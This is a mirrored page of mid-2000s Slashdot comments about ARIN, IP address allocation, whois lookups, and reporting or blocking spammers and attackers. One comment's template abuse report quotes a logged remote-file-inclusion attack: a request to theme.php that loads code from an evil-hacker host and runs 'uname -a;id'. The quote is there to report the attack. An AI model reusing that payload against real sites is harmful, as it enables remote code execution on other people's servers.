arin.net · Domains · Slashdot Mirror

How I assume they did this by the+frizz · 2005-01-04 20:14 · Score: 1 · on How Company Employees Use The Web

Collect lots of logs with client IP addresses and User Agents from various popular web sites.
Since www.visitorville.com is in the business of providing web stats, they are probably aggregating stats from many of their customers.
Get the mapping of which IP address blocks are owned by which companies.
You can get them the registries (e.g., ARIN, RIPE , APNIC) by asking nicely and agreeing to use them for marketing.
Write some software that dissects user agents and OS from the User-Agent value and counts occurrences per per IP address block owner.

PS: www.visitorville.com is not currently down like intelligence.visitorville.com is. And it was previously mentioned on Slashdot.

not necessarily a shortage by bedessen · 2004-12-27 03:58 · Score: 1, Flamebait · on China Lights Pure IPv6 Network

As far as I understand it, the idea that there is a shortage of IPv4 addresses is really a myth. I read a paper that someone wrote that came to the conclusion that even with the current growth rate (exponential) that we would not run out of addresses for another 20 years or so.

I think the real problem is that these days the RIRs (such as ARIN and APNIC) require justification before allocating netblocks. That means you have to show either current usage need or plans for future expansion, or both. You can't just say, "I'd like a /16 please" and expect to get it it. So really I think the non-US countries like to say "netspace is limited" but what they really mean is "sure we can get all the netblocks we want but it requires some paperwork and justification and we're just bitter that old companies back in the 80s were handed out whole /8s for the asking."

By the way, here is the data I have that shows total number of IP addresses for all netblocks allocated to each country (top 10):

US 1,828,328,425
JP 117,486,311
GB 84,658,624
DE 69,438,200
AU 65,918,741
CA 64,257,591
CN 54,172,684
FR 45,387,299
NL 35,056,078
KR 34,084,629

The source for these numbers was the aggregated data from http://ip-to-country.webhosting.info/

Re:Eventually there won't be any IPv4 left! by Michael+Wardle · 2004-11-26 15:00 · Score: 1 · on Lycos Declares War on Spam Servers

a friend of mine just heard that a few class A blocks were just assigned to APNIC and immediately firewalled them off

APNIC is the authority for 62 countries in the Asia-Pacific region including Australia, China, India, Indonesia, Korea, Malaysia, New Zealand, and Singapore. Obviously his actions were totally reasonable.

Re:Where can I sign up? by imperialyoyo · 2004-09-21 16:38 · Score: 1 · on Accelerating IPv6 Adoption With Proxy Servers

Check that you meet the prereqs then fill out an application

Re:Where can I sign up? by imperialyoyo · 2004-09-21 16:38 · Score: 1 · on Accelerating IPv6 Adoption With Proxy Servers

Check that you meet the prereqs then fill out an application

Re:Abuse@ by CFrankBernard · 2004-08-13 07:45 · Score: 1 · on Dealing with Intruders?

http://www.arin.net/
http://www.dnsstuff.com/
(not dnsstuff.org)

My basic template to ISPs by BrynM · 2004-08-12 20:13 · Score: 4, Interesting · on Dealing with Intruders?

Please note that this is innefectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN and who has registered domain names at a lot of different places. Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

Due to abuse, the following IP address(s) have been banned from accessing mydomain.com and it's associated services. The abuse is detailed as follows: IP(s) Banned: 216.nnn.225.nn Owner: OrgName: SOME ISP Address: 2 Hacker Home Street City: Isabel StateProv: CA PostalCode: 01120 Country: US Admin Address: noc@someisp.net Reason: Malformed URL - Attempted PHP Exploit "216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET /themes/default/theme.php?THEME_DIR=http://w ww.evil-hacker. net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352" Severity: 5 Remaining bans until entire address block banned: 3 If you have any questions or need further explanation, please contact admin@mydomain.com. You Your Title Your Contact Info

Re:Well, they got the geolocation wrong for my sit by Nintendork · 2004-07-12 14:47 · Score: 2, Informative · on Network Solutions Overhauls Whois Results

Well this would be why it places you in Chicago. That's the netblock containing the IP that kravlor.com resolves to.

One thing that interests me is that it says my company's web server is Apache. We switched to IIS6 like two months ago.

-Lucas

Re:Like IPv6 isn't good enough by Anonymous Coward · 2004-07-03 04:51 · Score: 1, Informative · on China Deploys IPv9 Network

Let's just give everyone(aprox 10 billion or so) 1 trillion personal adresses.

Actually, IPv6 addresses will be assigned in blocks of at least 64 bits (even for home users), which is over 18446744 trillion addreses (2^64). A typical business will get at least a /48, or 2^80 addresses.

This page explains it, and RFC 3177 has more details (including the authors' reasoning that this is not a waste of address space).

Re:Like IPv6 isn't good enough by Anonymous Coward · 2004-07-03 04:51 · Score: 1, Informative · on China Deploys IPv9 Network

Let's just give everyone(aprox 10 billion or so) 1 trillion personal adresses.

Actually, IPv6 addresses will be assigned in blocks of at least 64 bits (even for home users), which is over 18446744 trillion addreses (2^64). A typical business will get at least a /48, or 2^80 addresses.

This page explains it, and RFC 3177 has more details (including the authors' reasoning that this is not a waste of address space).

Re:Non-ISP-Internet by darth_MALL · 2004-06-10 07:10 · Score: 2, Informative · on Testing ISP Censorship

not sure if you are kidding or not, but you can find some good info on becoming your own ISP Here.

Re:Mirror by frenetic3 · 2004-04-28 05:45 · Score: 1 · on MIT Student Grills Valenti on Fair Use

I don't know how stable that site is, mod this down if it's redundant.

Yeah, those flaky ass .mit.edu sites... you know, those guys who have an entire Class A (18.x.x.x) subnet to themselves :P

-fren

Re:Inevitable, and other countries are next. by Nintendork · 2004-04-26 03:59 · Score: 1 · on Spanish Internet Provider's SMTP traffic Blocked

If the option was available to filter out incoming email from outside your home region or a whitelist of regions on a per mailbox basis and you took advantage of the offer, you would not sever any existing connections. Everyone who chooses to keep receiving emails from outside wouldn't have to do a thing and they would continue to get all email.

I find it odd that people would regularly use a mail server outside of their home region unless they're traveling and authenticating to the SMTP server (To get around the relay block since they're off the home network).

I've read some responses to your post and they all pretty much say the same thing: "Don't build a wall like China!" Those comments are crap though. This idea is not that same as a government body which regulates all information coming in to and out of their country. It's a personal choice that empowers the individual. If I were given the choice, I would block all IPs that weren't part of ARIN. If my workplace weren't in the translation and interpretation business, I would do the same thing there.

-Lucas

Re:Command line? by elemental23 · 2004-04-06 07:48 · Score: 1 · on Linux for iPod Matures

192.10.1.2? I wonder how Symbolics, Inc. feels about that, being the owners of 192.10.0.0/16 and all.

Perhaps they meant to use 192.168.1.2? Where do I file a bug report?

Re:Oh bloody hell by Andux · 2004-03-29 09:27 · Score: 1 · on Political Pop-ups, and Follow the Money

No problem. Just look up the IP on ARIN. If they tell you to look it up on RIPE/APNIC/whoever, it's from overseas; otherwise, it's generally from the US.

Re:Good luck by golgotha007 · 2004-03-23 06:52 · Score: 2, Informative · on .mail Domain To Eliminate Spam?

Uhm, what part of DNS aren't you understanding?

obviously more than yourself.

you see, just because you have reverse entries in your own DNS servers doesn't mean that you're authoritative for those IP addresses.

you might want to check out ARIN for more information on this.

p.s. if you want to prevent yourself looking like an ass in the future, try this:
if you're not 100 percent sure about a particular subject, send in a probe before you send in the missles.

Re:Where does ownership go *now*? by someonehasmyname · 2004-03-23 01:54 · Score: 1 · on 100-Year Domain Renewals?

Are IP numbers "owned" or rented from ICANN?

No, they're owned by ARIN

Make spamming just a bit harder... by Serious+Simon · 2004-03-05 10:01 · Score: 1 · on Gates on Spam

the problem is, there's no good way to kick somebody off of the Internet.

You can try...

I started sending "abuse" e-mails to ISP's whose network is used to send spam (terms and conditions of most ISP's prohibit sending spam).

By opening extended header information in your e-mail client, and examining the "received" headers you can find out the IP address (watch out for fake "received" headers), and sometimes the domain, of the sending machine. You may need to use reverse DNS or whois services to find out the domain or the network owner of the IP address.

I check www.domain to see if it's a regular operation.

Then I forward the e-mail, including the extended header information, to abuse@domain asking to take appropriate measures. Hopefully the account will be shut down or the owner of a hijacked PC alerted.

I don't know if it helps much but in any case I feel better doing this.

I already block EV1 due to spamming by Skapare · 2004-03-02 06:59 · Score: 2, Informative · on EV1 Servers CEO Responds To Customers

I already block EV1 due to spamming. Back in March 2003, my servers were hit with a huge repeated spam attack coming from several addresses in an EV1 address range. It wasn't so huge as to bring down the servers, and they did keep running. But it played hell with my statistical and performance measurements. In terms of incoming email delivery attempts, it was a huge spike on the graph. And despite attempts to communicate with them to get them to stop this, sent my email and made by telephone, I was never able to get the word to any responsible person. A week into the situation it was still going on and I had heard nothing from several emails sent to their abuse address. So I called by telephone and spoke to idiots who refused to even pass on a message, much less get someone responsible on the phone. All he suggested was to send more email to an address that was obviously not being read by anyone capable of stopping the attack. This went on for 6 weeks.

So is it any wonder why I am blocking all of these EV1 address ranges from my mail server:

Note that it isn't because of the spam attack that these are blocked; it's because of the irresponsible way that EV1 is managed that these are blocked.

Had EV1 been sued by SCO, and fought the suit, that would have been reason enough for me to completely wipe out that spam attack incident and remove these blocks. Had Head Surfer even so much as simply announced a refusal to pay extortion money to SCO, and donated it instead to the defense fund, that would also have been reason enough for me to completely wipe out that spam attack incident and remove these blocks. But instead, SCO has not only been helped, but this practice of legalized extortion has been further encouraged. That's reason enough for me to lock these addresses in place.